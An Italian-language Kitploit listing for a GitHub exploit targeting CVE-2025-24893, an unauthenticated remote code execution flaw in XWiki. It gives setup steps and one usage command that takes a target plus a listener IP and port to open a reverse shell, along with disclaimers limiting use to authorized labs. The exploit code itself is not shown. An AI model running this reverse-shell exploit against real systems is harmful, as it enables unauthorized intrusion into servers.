Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24893 — Exploit stile OSCP per CVE-2025-24893 per Linux XWiki | Kitploit
Strumenti/GitHubGitHub/vasilysaint/cve-2025-24893
ExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoLab e Pratica
GitHubvasilysaint/cve-2025-24893

CVE-2025-24893

Exploit stile OSCP per CVE-2025-24893 per Linux XWiki

Vedi Repository
12 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24893

XWiki Platform è una piattaforma wiki generica che fornisce servizi runtime per le applicazioni costruite su di essa. A causa di una vulnerabilità nell'endpoint SolrSearch, un utente non autenticato può ottenere l'esecuzione arbitraria di codice remoto. Questa vulnerabilità compromette la riservatezza, l'integrità e la disponibilità dell'intera installazione XWiki.

CVE: CVE-2025-24893


Demo

Di seguito è mostrata una dimostrazione dell'exploit:

Terminal Demo

Utilizzo

Per utilizzare questo exploit, segui questi passaggi:

  1. Clona il repository: git clone https://github.com/yourusername/CVE-2025-24893.git
  2. Spostati nella directory clonata: cd CVE-2025-24893
  3. Installa le dipendenze richieste: pip install requests
  4. Esegui l'exploit:
root@kitploit:~
./CVE-2025-24893_linux-xwiki-exploit.py  -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]

Informazioni su questo exploit

Questo exploit dimostra la vulnerabilità di esecuzione remota di codice descritta in CVE-2025-24893 e consente a un utente non autenticato di ottenere una reverse shell su installazioni XWiki Linux vulnerabili.

Ho originariamente sviluppato questo strumento per l'uso in ambienti di formazione come i laboratori di preparazione OSCP e Hack The Box, dove volevo un modo semplice e affidabile per riprodurre la vulnerabilità. Poiché nessuno strumento esistente soddisfaceva i miei requisiti, ho deciso di crearne uno.

Sebbene CVE-2025-24893 sia stata corretta da tempo nelle versioni supportate di XWiki, questo exploit dovrebbe essere utilizzato solo contro sistemi di tua proprietà o per i quali hai esplicitamente ricevuto autorizzazione a testarli.

L'autore non si assume alcuna responsabilità per un uso improprio di questo software o per eventuali danni derivanti dal suo utilizzo.

Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e a valutazioni di sicurezza autorizzate.

Utilizzalo solo contro sistemi di tua proprietà o per i quali hai esplicitamente ricevuto autorizzazione a testarli. L'autore non si assume alcuna responsabilità per un uso improprio di questo software o per eventuali danni derivanti dal suo utilizzo.

Contributi

I contributi sono benvenuti.

Se incontri bug, hai suggerimenti per miglioramenti o desideri aggiungere supporto per payload, piattaforme o funzionalità aggiuntive, sentiti libero di aprire un issue o inviare una pull request.

Il feedback costruttivo, i report di test e i contributi di codice sono molto apprezzati.

Scarica lo strumento